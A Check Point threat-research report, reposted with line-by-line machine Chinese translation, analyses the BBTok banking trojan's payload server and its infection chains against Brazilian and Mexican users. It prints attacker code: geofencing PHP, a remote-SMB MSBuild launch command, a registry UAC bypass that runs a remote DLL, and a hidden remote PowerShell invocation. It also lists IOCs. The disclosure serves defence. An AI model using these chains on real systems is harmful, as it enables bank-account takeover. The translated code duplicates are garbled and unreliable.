渗透技巧 3个月前 admin
230 0 0

Introduction 介绍

Check Point Research recently discovered an active campaign operating and deploying a new variant of the BBTok banker in Latin America. In the research, we highlight newly discovered infection chains that use a unique combination of Living off the Land Binaries (LOLBins). This resulting in low detection rates, even though BBTok banker operates at least since 2020. As we analyzed the campaign, we came across some of the threat actor’s server-side resources used in the attacks, targeting hundreds of users in Brazil and Mexico.
Check Point Research最近发现了一个活跃的活动,在拉丁美洲运营和部署BBTok银行家的新变种。在这项研究中,我们重点介绍了新发现的感染链,这些感染链使用独特的陆地二元体(LOLBins)组合。这导致检出率低,尽管BBTok银行家至少自2020年以来一直在运营。在我们分析活动时,我们遇到了攻击中使用的一些威胁参与者的服务器端资源,针对巴西和墨西哥的数百名用户。

The server-side components are responsible for serving malicious payloads that are likely distributed through phishing links. We’ve observed numerous iterations of the same server-side scripts and configuration files which demonstrate the evolution of the BBTok banker deployment methods over time. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet implemented, as well as trace the origins of the source code employed for sustaining such operations.

In this report, we highlight some of the server-side functionalities of the payload server which are used to distribute the banker. Those allow to generate unique payloads to each of the victims, generated upon a click.

Key Findings 主要发现

  1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered geo-fencing to ensure infected machines are from those countries only.
  2. Since the last public reporting on BBTok in 2020, the operators’ techniques, tactics and procedures (TTPs) have evolved significantly, adding additional layers of obfuscation and downloaders, resulting in low detection rates.
    自 2020 年上次公开报道 BBTok 以来,运营商的技术、战术和程序 (TTP) 发生了重大变化,增加了额外的混淆和下载层,导致检测率低。
  3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number.
  4. The newly identified payloads are generated by a custom server-side application, responsible for generating unique payloads for each victim based on operating system and location.
  5. Analysis of payload server-side code revealed the actors are actively maintaining diversified infection chains for different versions of Windows. Those chains employ a wide variety of file types, including ISO, ZIP, LNK, DOCX, JS and XLL.
  6. The threat actors add open-source code, code from hacking forums, and new exploits when those appear (e.g. Follina) to their arsenal.
    威胁行为者将开源代码、来自黑客论坛的代码以及出现的新漏洞(例如 Follina)添加到他们的武器库中。

Background 背景

The BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks. The banker has a wide set of functionalities, including enumerating and killing processes, keyboard and mouse control and manipulating clipboard contents. Alongside those, BBTok contains classic banking Trojan features, simulating fake login pages to a wide variety of banks operating in Mexico and Brazil.
BBTok 银行家于 2020 年首次披露,通过无文件攻击部署在拉丁美洲。银行家具有广泛的功能,包括枚举和终止进程,键盘和鼠标控制以及操作剪贴板内容。除此之外,BBTok还包含经典的银行木马功能,模拟在墨西哥和巴西运营的各种银行的虚假登录页面。

Since it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still primarily utilizing phishing emails with attachments for the initial infection. Recently we’ve seen indications of the banker distributed through phishing links, and not as attachments to the email itself.

Upon accessing the malicious link, an ISO or ZIP file is downloaded to the victim’s machines. Those contain an LNK file that kicks off the infection chain, leading to the deployment of the banker while opening a decoy document. Although the process appears to be quite straightforward upon first glimpse, we’ve found evidence that there’s a lot going on behind the scenes.
访问恶意链接后,ISO 或 ZIP 文件会下载到受害者的计算机上。这些包含一个LNK文件,该文件启动了感染链,导致在打开诱饵文件时部署银行家。虽然这个过程乍一看似乎很简单,但我们发现有证据表明幕后发生了很多事情。

While analyzing these newly identified links, we’ve uncovered internal server-side resources used to distribute the malware. Looking at those, it became evident the actor has maintained a much wider variety of infection chains, generated on demand with each click, tailored to match the victim’s operating system and location.

BBTok Banking Hijacks BBTok银行劫持

BBTok enables its operators a wide set of capabilities, ranging from remote commands to classic banking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its code references over 40 major banks in Mexico and Brazil, such as Citibank, Scotibank, Banco Itaú and HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of its victims being clients of those banks by iterating over the open windows and names of browser tabs, searching for bank names.

The default target the banker apparently aims at is BBVA, with the default fake interface aiming to replicate its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users into divulging personal and financial details. The focus of this functionality is tricking the victim into entering the security code/ token number that serves as 2FA for bank account and to conduct account takeovers of victim’s bank account. In some cases, this capability also aims to trick the victim into entering his payment card number.
银行家的目标显然是BBVA,默认的假界面旨在复制其外观。这些虚假界面伪装成合法机构,诱使毫无戒心的用户泄露个人和财务详细信息。此功能的重点是诱骗受害者输入用作银行帐户 2FA 的安全代码/令牌号,并对受害者的银行帐户进行帐户接管。在某些情况下,此功能还旨在诱骗受害者输入他的支付卡号。

Figure 1 – Examples of fake interfaces embedded within the BBTok Banker.
图 1 – BBTok 银行家中嵌入的虚假接口示例。

BBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that, quite literally, form these fake interfaces. This allows the attackers to dynamically and naturally generate interfaces that fit the victim’s computer screen and a specific form for the bank of the victim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface stored in one such form named “TFRMBG”. In addition to Banking sites, the attackers have kept up with the times and have also started searching for information regarding Bitcoin on the infected machine, actively looking for strings such as ‘bitcoin’, ‘Electrum’, and ‘binance’.

BBTok doesn’t stop at visual trickery; it has other capabilities as well. Specifically, it can install a malicious browser extension or inject a DLL named “rpp.dll” to further its hold on the infected system, and likely to improve its capabilities to trick the victims. Those were not available during the time of analysis.
BBTok 并不止于视觉上的诡计;它还具有其他功能。具体来说,它可以安装恶意浏览器扩展程序或注入名为“rpp.dll”的DLL,以进一步控制受感染的系统,并可能提高其欺骗受害者的能力。在分析期间没有这些资料。

What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system.

Payload Server Analysis 有效负载服务器分析

Overview of the Payload Server

To effectively manage their campaign, the BBTok operators created a unique flow kicked off by the victim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results in the download of either a ZIP archive or an ISO image, depending on the victim’s operating system. Although the process is seamless for the victim, the server generates a unique payload based on parameters found within the request.
为了有效地管理他们的活动,BBTok运营商创建了一个独特的流程,由受害者单击恶意链接启动,该链接可能是在网络钓鱼电子邮件中发送的。当受害者单击该链接时,它会导致下载 ZIP 存档或 ISO 映像,具体取决于受害者的操作系统。尽管该过程对受害者来说是无缝的,但服务器会根据请求中找到的参数生成唯一的有效负载。

Figure 2 – Server-side components used in BBTok infections.
图2 –BBTok感染中使用的服务器端组件。

This process is carried out on a XAMPP-based server, and contains three essential components:
此过程在基于 XAMPP 的服务器上执行,包含三个基本组件:

  1. A PowerShell script that handles payload preparation and contains the main bulk of the logic for creating lure archives.
    一个 PowerShell 脚本,用于处理有效负载准备,并包含用于创建诱饵存档的主要逻辑。
  2. A PHP codebase and database designed to document and manage infections.
  3. Auxiliary utilities that enhance the functionality of these components.

This is the chain of events:

  1. A victim performs an HTTP request to either /baixar/descargar or /descarga (these paths suggest that the lures are in either Spanish or Portuguese).
    受害者向 /baixar 或 执行 /descargar HTTP 请求 /descarga (这些路径表明引诱是西班牙语或葡萄牙语)。
  2. Based on the .htaccess file, the server handles the request using descarga.php.
    根据 .htaccess 该文件,服务器使用 descarga.php .
  3. The scripts utilize the file db.php to store information via an SQLite database about the request, including the victim’s fingerprint.
    脚本利用该文件 db.php 通过SQLite数据库存储有关请求的信息,包括受害者的指纹。
  4. Descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually delivered to the victim.
    Descarga.php 调用 ps_gen.ps1 以生成自定义存档,该存档最终会传递给受害者。

Incoming Requests Handling

The PHP codebase is composed of the following files:
PHP 代码库由以下文件组成:

  1. descarga / descargar.php – Manages new connections and serves lure documents to the victim’s PC.
    descarga / descargar.php – 管理新连接并将诱饵文档提供给受害者的 PC。
  2. db.php – Generates and manages the SQLite database that includes the victim’s details.
    db.php – 生成和管理包含受害者详细信息的 SQLite 数据库。
  3. generator.php – Utility class used to generate random links, strings, and other functionalities.
    generator.php – 用于生成随机链接、字符串和其他功能的实用程序类。

“Descarga” and “descargar” translate to “download” in Spanish. This file contains the main logic of the infection process. The script itself contains many comments, some of them in plain Spanish and Portuguese, which provide hints as to the attackers’ origin.

The script logic: 脚本逻辑:

  1. It checks the geolocation of the link-referred victim against and stores it in a file. If the victim isn’t from a targeted country (i.e., Mexico or Brazil) the HTTP connection ends immediately with a 404 message.
    它根据 检查链接引用的受害者的地理位置,并将其存储在文件中。如果受害者不是来自目标国家/地区(即墨西哥或巴西),则 HTTP 连接会立即以 404 消息结束。
$api = new IpApi(); $api = 新的 IpApi();
$whoAmI = $api->GetInfo($ip);
$whoAmI = $api->获取信息($ip);
$allowed = array("MX", "BR");
$allowed = array(“MX”, “BR”);
file_put_contents("ips/".$ip.$whoAmI->countryCode, "");
file_put_contents(“ips/”.$ip.$whoAmI->国家代码, “”);
if(!in_array($whoAmI->countryCode, $allowed)) {
if(!in_array($whoAmI->countryCode, $allowed)) {

2. If the victim passes the check, the script then parses the user agent to get the victim’s Windows OS version.
2. 如果受害者通过检查,脚本会解析用户代理以获取受害者的 Windows 操作系统版本。

$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));
$useragent = strtolower(htmlspecialchars($_SERVER['HTTP_USER_AGENT']));
$match = false; $match = 假;
$dfile = "10"; $dfile = “10”;
$dfiles = array ( $dfiles = 数组 (
'windows nt 10.0' => '10',
'Windows NT 10.0' => '10',
'windows nt 6.3' => '10',
'Windows NT 6.3' => '10',
'windows nt 6.2' => '10',
'Windows NT 6.2' => '10',
'windows nt 6.1' => '7',
'Windows NT 6.1' => '7',
'windows nt 6.0' => '7',
'Windows NT 6.0' => '7',
'windows nt 5.2' => '7'
'Windows NT 5.2' => '7'
foreach($dfiles as $os=>$file) {
foreach($dfiles as $os=>$file) {
if (preg_match('/' . $os . '/i', $useragent)) {
如果 (preg_match('/' . $os .'/i', $useragent)) {
$match = true;
$match = 真;
$dfile = $file;
$dfile = $file;

3. It then passes the user agent with the victim’s country code and lure filename to the PowerShell payload generator script.

PowerShell Payload Generator

The script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or ISO files. The latest version of the code has a lot of commented-out sections that were likely functional in the past, which suggests they contain additional infection chains and lures. We found multiple versions of the file, some dating back to July 2022, demonstrating that this operation has been ongoing for quite a while.
该脚本 ps_gen.ps1 包含用于生成存档有效负载(作为 ZIP 或 ISO 文件)的主要逻辑。最新版本的代码有很多注释掉的部分,这些部分在过去可能起作用,这表明它们包含额外的感染链和诱饵。我们发现了该文件的多个版本,其中一些版本可以追溯到 2022 年 7 月,这表明此操作已经进行了相当长的一段时间。

Our analysis of the latest version is below. For more details on earlier variations and changes to the script over time, see the section “Earlier Versions.

The generator script is called by descarga.php, using the function DownloadFile with the arguments file_namever and cc. These correspond to the generated archive name, the victim’s OS version and the victim’s country code.
生成器脚本由 调用 descarga.php ,使用带有参数 file_name 的函数 DownloadFile , ver 并且 cc. 这些对应于生成的存档名称、受害者的操作系统版本和受害者的国家/地区代码。

function DownloadFile($file_name, $ver, $cc) {
函数下载文件($file_名称, $ver, $cc) {
if($ver == "10" )
if($ver == “10” )
$ext = "iso";
$ext = “iso”;
} else {
} else {
$ext = "zip";
$ext = “zip”;
exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.' '.$ver.' '.$cc);
exec('powershell -ex Bypass -File ./ps_gen.ps1 '.$file_name.”“.$ver。” “.$cc);
return $file_name.'.'.$ext;

The code portions utilized in the observed iteration of the server generate the archive payloads based on two parameters:

  1. The origin country of the victim – Brazil or Mexico.
  2. Operating System extracted from the User-Agent – Windows 10 or 7.
    从用户代理中提取的操作系统 - Windows 10 或 7。

According to the results, the following parameters of the malicious archive are selected:

  1. Type of the archive: ISO for Windows 10, ZIP for Windows 7, and others.
    存档类型:Windows 10 的 ISO、Windows 7 的 ZIP 等。
  2. The name of the DLL file that is used in the next stage changes according to the targeted country: Trammy is used for Brazil, and Gammy is used for Mexico.
    下一阶段中使用的 DLL 文件的名称会根据目标国家/地区而更改: Trammy 用于巴西, Gammy 用于墨西哥。
  3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by Microsoft Edge, and the one for Windows 7 is used by Google Chrome.
    存档包含一个 LNK。Windows 10中的LNK快捷方式图标是Microsoft Edge使用的,Windows 7中的快捷方式图标是Google Chrome使用的。
  4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file named dat.xml from the server 216[.]250[.]251[.]196, which also stores the malicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant remote DLL via CMD execution.
    最终执行逻辑。对于Windows 10受害者,该脚本使用从服务器 216[.]250[.]251[.]196 命名 dat.xml 的文件执行MSBuild.exe该文件还存储下一阶段的恶意DLL。对于Windows 7,有效负载只是通过CMD执行下载相关的远程DLL。
$shortcutName = $args[0]
$win = $args[1]
$country = $args[2]
$stegoKey = New-StegoKey 35
$stegoKey = 新剑钥匙 35
if($country -eq "BR") { if($country -eq “BR”) {
$dllName = 'Trammy'
$dllName = “电车”
} else {
$dllName = 'Gammy'
$dllName = “Gammy”
if($win -eq "10") { if($win -eq “10”) {
$wstate = 7
$wstate = 7
$shortcutIconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$shortcutIconLocation = “C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe”
} else {
$wstate = 7
$wstate = 7
$shortcutIconLocation = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
$shortcutIconLocation = “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe”

Add-PoshObfuscation 添加混淆

All payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of the code yields a single result from the “benign” site hackforums[.]net, specifically a response from a user named “Qismon” in August 2021. This individual recommends some methods to bypass AMSI and security products, and also shares the PoshObfuscation code:
所有有效负载都使用 Add-PoshObfuscation 函数进行模糊处理。对部分代码的简单搜索会从“良性”站点hackforums中产生一个结果。网,特别是 2021 年 8 月一位名为“Qismon”的用户的回应。此人推荐了一些绕过 AMSI 和安全产品的方法,并分享了 PoshObfuscation 代码:

Figure 3 – Add-PoshObfuscation() code shared in hackforums[.]net.
图 3 – 在黑客论坛中共享的 Add-PoshObfuscation() 代码[.]网。

Infection Chains and Final Payload

The process described above eventually leads to two variations of the infection chain: one for Windows 7 and one for Windows 10. The differences between the two versions can be explained as attempts to avoid newly implemented detection mechanisms such as AMSI.
上述过程最终会导致感染链的两种变体:一种用于Windows 7,另一种用于Windows 10。两个版本之间的差异可以解释为试图避免新实现的检测机制,如 AMSI。

*ammy.dll Downloaders *阿米.dll下载器

Both infection chains utilize malicious DLLs named using a similar convention – TrammyGammyBrammy, or Kammy. The latter are leaner and obfuscated versions of BBTok’s loader that use geofencing to thwart detection before executing any malicious actions. The final payload is a new version of the BBTok banker. As documented previously, BBTok comes packed with multiple additional password-protected software. These allow the actors full access to the infected machine, and additional functionalities.
两个感染链都使用使用类似约定命名的恶意 DLL – Trammy 、 Gammy 、 Brammy 或 Kammy 。后者是BBTok加载程序的精简和混淆版本,在执行任何恶意操作之前使用地理围栏来阻止检测。最终的有效载荷是BBTok银行家的新版本。如前所述,BBTok附带了多个其他受密码保护的软件。这些允许参与者完全访问受感染的计算机和其他功能。

Windows 7 Infection Chain
视窗 7 感染链

Figure 4 – Windows 7 Infection Chain.
图4 –Windows 7感染链。

The infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon execution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads, extracts, and runs the BBTok payload.
Windows 7的感染链不是唯一的,由存储在ZIP文件中的LNK文件组成。执行后,LNK 文件使用 运行 *ammy.dll 有效负载,进而下载、提取和 rundll32.exe 运行 BBTok 有效负载。

Windows 10 Infection Chain
视窗 10 感染链

Figure 5 – Windows 10 Infection Chain.
图 5 – Windows 10 感染链。

The infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a lure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using the renamed cmd.exe to run all the commands in the following manner:
Windows 10 的感染链存储在包含 3 个组件的 ISO 文件中:LNK 文件、诱饵文件和重命名的 cmd.exe可执行文件。单击 LNK 文件将启动感染链,使用重命名的 cmd.exe 以以下方式运行所有命令:

DANFE352023067616112\DANFE352023067616112.exe /c copy %cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y & start %userprofile%\DANFE352023067616112.pdf & C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\\file\dat.xml
DANFE352023067616112\DANFE352023067616112.exe /c copy %cd%\DANFE352023067616112\DANFE352023067616112.pdf %userprofile%\DANFE352023067616112.pdf /Y & start %userprofile%\DANFE352023067616112.pdf & C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -nologo \\\file\dat.xml

The infection chain: 感染链:

  1. Copy the lure file to the folder %userprofile% and open it.
    将诱饵文件复制到文件夹 %userprofile% 并打开它。
Figure 6 – Lure document dropped in BBTok infection.
图6 –诱饵文档在BBTok感染中掉落。
  1. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched over SMB.
    运行 MSBuild.exe 以使用存储在远程服务器上的 XML(通过 SMB 提取)生成应用程序。
  2. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the server and runs it with a renamed rundll32.exe(mmd.exe), as seen in the XML contents:
    MSBuild.exe 创建一个随机命名的 DLL,该 DLL 又从服务器下载 *ammy.dll 并使用重命名 rundll32.exe 的 ( mmd.exe ) 运行它,如 XML 内容所示:
private void ByFD() { private void ByFD() {
String reg = "/c REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d \"C:\\ProgramData\\mmd.exe \\\\\\file\\Trammy.dll, Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f & REG DELETE HKCU\\Software\\Classes\\.pwn /f\" /f & REG ADD HKCU\\Software\\Classes\\ms-settings\\CurVer -ve /d \".pwn\" /f & timeout /t 3 >nul & start /MIN computerdefaults.exe";
String reg = “/c REG ADD HKCU\\Software\\Classes\\.pwn\\Shell\\Open\\command -ve /d \”C:\\ProgramData\\mmd.exe \\\\\\file\\Trammy.dll, Dacl & REG DELETE HKCU\\Software\\Classes\\ms-settings /f & REG DELETE HKCU\\Software\\Classes\\Classes\\ms-settings\\CurVer -ve /d \“.pwn\” /f & timeout /t 3 >nul & start /MIN computerdefaults.exe“;
StartProcess("cmd.exe", reg); }
StartProcess(“cmd.exe”, reg);}
  1. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.

The unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low detection rate for the Windows 10 infection chains.
重命名的 CMD、MSBuild 和通过 SMB 提取文件的独特组合导致 Windows 10 感染链的检测率较低。

Earlier Versions 早期版本

Throughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts from the payload server. We saw changes in all parts of the operation: the PHP code, the PowerShell script, and other utilities.

Changes in the PHP Code
PHP 代码中的更改

Looking at an earlier version of the descarga.php script, we saw a few key differences:
查看脚本的 descarga.php 早期版本,我们看到了一些关键差异:

  1. Originally, only victims from Mexico were targeted.
  2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the script.
    其他有效负载服务器的 176[.]31[.]159[.]196 IP 在脚本中进行了硬编码。
  3. Instead of executing the PowerShell script directly, a script named gen.php was called. We were unable to obtain this script, but believe it simply executed the PowerShell script.
    不是直接执行 PowerShell 脚本,而是调用了一个名为的 gen.php 脚本。我们无法获得此脚本,但相信它只是执行了PowerShell脚本。
  4. The victim’s IP address, user agent, and a flag (jaBaixou, or ‘already downloaded’ in Portuguese) were inserted into a database, using the db.php file. The flag is later checked to not serve the same payload twice.
    受害者的IP地址,用户代理和标志( jaBaixou 葡萄牙语中“已下载”)入到数据库中,使用 db.php 该文件。稍后会检查该标志,使其不会两次提供相同的有效负载。

As this section is not used in the latest version, it is possible that the attackers found this process cumbersome and decided to trade OPSEC for easier management and a higher chance of infection success.

Modifications of the PowerShell Script
PowerShell 脚本的修改

Looking at older versions of the PowerShell script, it was clear that numerous changes were done to the payload and execution chain. Some noteworthy ones include:

  1. In the earliest versions of the script, the LNK simply ran a PowerShell script with the arguments -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1.
    在脚本的最早版本中,LNK 只是运行带有参数 -ExecutionPolicy Unrestricted -W hidden -File \\%PARAM%[.]supplier[.]serveftp[.]net\files\asd.ps1 的 PowerShell 脚本。
  2. A later update added the lure PDF, fac.pdf (“fac” is an abbreviation of “factura”, which is “invoice” in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in Mexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican government site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.
    后来的更新添加了诱饵PDF( fac.pdf “fac”是“factura”的缩写,在葡萄牙语中是“发票”)。这是来自墨西哥科利马县的西班牙语合法收据。此外,Windows 7受害者的有效载荷启动了一个合法的墨西哥政府网站。 hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html
  3. The newest version we found opens a different legitimate site, hxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes the XML file used by MSBuild and changes the name of the DLL reserved for Brazilian targets from Brammy.dll to Trammy.dll.
    我们发现的最新版本打开了一个不同的合法网站, hxxps://fazenda[.]gov[.]br 一个巴西政府网站。此版本还会更改 MSBuild 使用的 XML 文件,并将为巴西目标保留的 DLL 的名称从 Brammy.dll 更改为 Trammy.dll 。

Unused Code and Infection Vectors

Certain sections of the code within the PowerShell script were unused, and the server hosted files that were not part of the primary infection flow we discussed. In particular, we did not discover any indication of active usage of the following:
PowerShell 脚本中的某些代码部分未使用,并且服务器托管的文件不属于我们讨论的主要感染流。特别是,我们没有发现任何主动使用以下药物的迹象:

  1. ze.docx is a document that exploits the Follina CVE (2022-30190). It is referenced in the PowerShell script in a function named CreateDoc.
    ze.docx 是利用 Follina CVE (2022-30190) 的文档。它在 PowerShell 脚本中名为 CreateDoc 的函数中引用。
  2. xll.xll, which is referenced by CreateXLL, is a malicious xll taken from the open-source project, which implements code execution via Excel.
    xll.xll ,由 引用 CreateXLL ,是从开源项目 中获取的恶意 XLL,它通过 Excel 实现代码执行。
  3. Numerous empty JavaScript files were found on the server, likely to be used by a function named CreateJS. The file referenced in the function, b.js, was empty, so it is unclear whether this function was previously used or was never fully implemented.
    在服务器上发现了许多空的 JavaScript 文件,这些文件可能被名为 CreateJS 的函数使用。函数中引用的文件 b.js 为 空,因此不清楚此函数以前是使用过还是从未完全实现。
  4. Multiple bat files were located on the server, each with a different implementation of downloading next stages. These were most likely created by a function named CreateBat, which is commented out in the latest version of the PowerShell script. Most of them are almost identical to the code in the ByFD function we analyzed previously, excluding two noteworthy past iterations:
    服务器上有多个蝙蝠文件,每个文件都有不同的下载下一阶段实现。这些很可能是由一个名为 CreateBat 的函数创建的,该函数在最新版本的 PowerShell 脚本中被注释掉。它们中的大多数与我们之前分析的 ByFD 函数中的代码几乎相同,不包括两个值得注意的过去迭代:

    1. The oldest bat file downloaded another PowerShell script as a next stage (which wasn’t publicly available anymore) instead of editing the registry;
    2. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one which is currently being used.
      后来的 bat 文件使用了 fodhelper UAC 旁路,而不是当前正在使用的计算机默认值。

Victimology and Attribution

Our analysis of the server-side component also sheds light on one of the recent campaigns as seen from the threat actors’ side, based on a database we found that documents access to the malicious application. The database is named links.sqlite and is pretty straightforward. It contains over 150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note the use of the Portuguese language and the names of the 4 rows:
我们对服务器端组件的分析还揭示了从威胁参与者方面看到的最新活动之一,该活动基于我们发现的数据库,该数据库记录了对恶意应用程序的访问。数据库已命名 links.sqlite ,非常简单。它包含 150 多个条目,所有条目都是唯一的,表标题对应于由 创建的 db.php 条目。请注意葡萄牙语的使用和 4 行的名称:

  1. chave, or key;  chave 或键;
  2. assunto, or subject;  assunto 或主题;
  3. user_agent ;
  4. baixou, or downloaded.
    baixou ,或已下载。

The column named chave contained the IP addresses of the victims, and the column assunto was empty:
名为 chave 的列包含受害者的 IP 地址,该列 assunto 为空:

Figure 7 – Links.sqlite database.
图 7 – Links.sqlite 数据库。
Figure 8 – Attack region.
图 8 – 攻击区域。

As the server code was never meant to be seen by anyone except the threat actors, and it contained numerous comments in Portuguese, we believe this indicates that with a high probability the threat actors are Brazilians, which is known for its active banking malware eco-system.

Conclusion 结论

Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed. Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.

It is rare for security researchers to get an up-close look at the attackers’ workbench, and even rarer to get glimpses of it as it evolved over time. What we saw reinforces our belief that all threat actors, including financially motivated ones, are constantly evolving and improving their methods, as well as following new security trends and trying out fresh ideas and opportunities. To keep up and protect against future attacks, security researchers must do the same.

Check Point Protections 检查点保护

Check Point Threat Emulation:

  • Banker.Wins.BBTok.A 银行家.赢.BBTok.A
  • Banker.Win.BBTok.B 银行家.赢.BBTok.B
  • Technique.Wins.SuxXll.A 技术.胜利.SuxXll.A
  • Trojan.Win.XllAddings.A Trojan.Win.XllAddings.A

Harmony Endpoint: 和谐端点:

  • Trojan.Win.Generic.AQ Trojan.Win.Generic.AQ
  • Trojan.Win.Generic.AR Trojan.Win.Generic.AR

Appendix A – IOCs
附录 A – 国际奥委会

Files 文件

Name 名字 Description 描述 sha256
DANFE357702036539112.iso Brazilian Lure Archive 巴西诱饵档案 be36c832a1186fd752dd975d31284bdd2ac3342bd3d32980c6c52271d0d2c84c
DANFE357666506667634.iso Brazilian Lure Archive 巴西诱饵档案 095b793d60ce5b15fac035e03d41f1ddd2e462ec4fa00ccf20553af3c09656f6
DANFE352023067616112.iso Brazilian Lure Archive 巴西诱饵档案 8e65383a91716b87651d3fa60bc39967927ab01b230086e3c5a2f9a096fc6c57
DANFE358567378531506.pdf Brazilian Lure PDF 巴西诱饵 PDF 825a5c221cb8247831745d44b424954c99e9023843c96def6baf84ccb62e9e5f
Brammy.dll 布拉米.dll BBTok Downloader for Brazilian Victims
Trammy.dll 特拉米.dll BBTok Downloader for Brazilian Victims
HtmlFactura3f48daa069f0e42253194ca7b51e7481DPCYKJ4Ojk.iso Mexican Lure Archive 墨西哥诱饵档案 808e0ddccd5ae4b8cbc4747a5ee044356b7aa67354724519d1e54efb2fc4f6ec
HtmlFactura-497fc589432931214ed0f7f4de320f3brzi8y1MTdn.iso Mexican Lure Archive 墨西哥诱饵档案 f83b33acfd9390309eefb4a17b42e89dcdbe759757844a3d9b474d570ddbab86
HtmlFactura-4887f50edb734a49d33639883b60796do52lTREjMh.iso Mexican Lure Archive 墨西哥诱饵档案 dbeb4960cdb04999c1a5a3360c9112e3bc1de79534d7ac9027b7fdb7798968a6
Html-Factura35493606948895934113728188857090JCOY.pdf Mexican Lure PDF 墨西哥诱饵 PDF be35b48dfec1cc2fc046423036fa76fc9096123efadac065c80361c45f401d3c
Kammy.dll 卡米.dll BBTok Downloader for Mexican Victims
Gammy.dll 嘎嘎.dll BBTok Downloader for Mexican Victims
ze.docx 泽.docx Unused Maldoc 未使用的马尔多克 3b43de8555d8f413a797e19c414a55578882ad7bbcb6ad7604bb1818dd3eedcd
xll.xll Unused Malicious xll 未使用的恶意 xll fb7a958b99275caa0c04be2a821b2a821bb797c4be6bd049fa09144de349ea41
fe BBTok cd22e14f4fa6716cfc9964fdead813d2ffb80d6dd716e2114f987ff36cc5e872
fe2 BBTok 5c59cd977890ed32eb60caca8dc2c9a667cff4edc2b12011854310474d5f405d
fe2 BBTok 5ad42b39f368a25a00d9fe15fa5326101c43bf4c296b64c1556bc49beeee9ae1
fe235 BBTok b198da893972df5b0f2cbcec859c0b6c88bb3cf285477b672b4f40c104bcbd36

Network Indicators 网络指标

Name 名字 Description 描述
Phishing Domain 网络钓鱼域
rendinfo[.]shop 仁信息[.]店 Phishing Domain 网络钓鱼域
Malicious DLL Download Domain
恶意 DLL 下载域
216[.]250[.]251[.]196 Payload Server 有效负载服务器
173[.]249[.]196[.]195 Payload Server 有效负载服务器
176[.]31[.]159[.]196 Payload Server 有效负载服务器
147[.]124[.]213[.]152 Payload Server 有效负载服务器

Appendix B – List of Targeted Banks
附录B – 目标银行名单

Banking Caixa 银行彩霞 CCB Brasil 建行巴西分行
Banco Itaú 伊陶银行 Mercantil do Brasil
Santander 桑坦德 BANCO PAULISTA 保利斯塔银行
Getnet 获取网 Banco Daycoval
Sicredi 西克雷迪 Mercado Pago 帕果市场
Sicoob 西库布 Nubank 努班克
Citibank Brasil 花旗银行巴西 C6 Bank C6银行
Internet Banking BNB 网上银行 Internet Banking Inter 网上银行国际
Unicred Portal 单一门户 Bancoob 班库布
Banco da Amazonia 亚马逊银行 BBVA 西班牙对外银行
Banestes 巴内斯特斯 Banorte 巴诺特
Banco Alfa 阿尔法银行 HSBC 汇丰银行
Banpará 班帕拉 Banamex 巴纳梅克斯
Banese 巴内塞 Bajio 巴希奥
BRB Banknet BRB银行网 Scotiabank 丰业银行
Banco Intermedium 中转银行 Afirme 阿菲尔
Banco Topázio 托帕齐奥银行 Banregio 班雷吉欧
Uniprime 优素数 Azteca 阿兹台克
Cooperativa de Crédito – CrediSIS Multiva 多迪瓦
Banco Original 银行原创 Inbursa 因布尔萨
Banco Fibra 菲布拉银行 CiBanco 西班科
Bradesco Despachantes e Auto Escola – Cidadetran Sicoobnet 西库布内特
Navegador Exclusivo Banco do Brasil 巴西银行


版权声明:admin 发表于 2023年9月21日 上午9:15。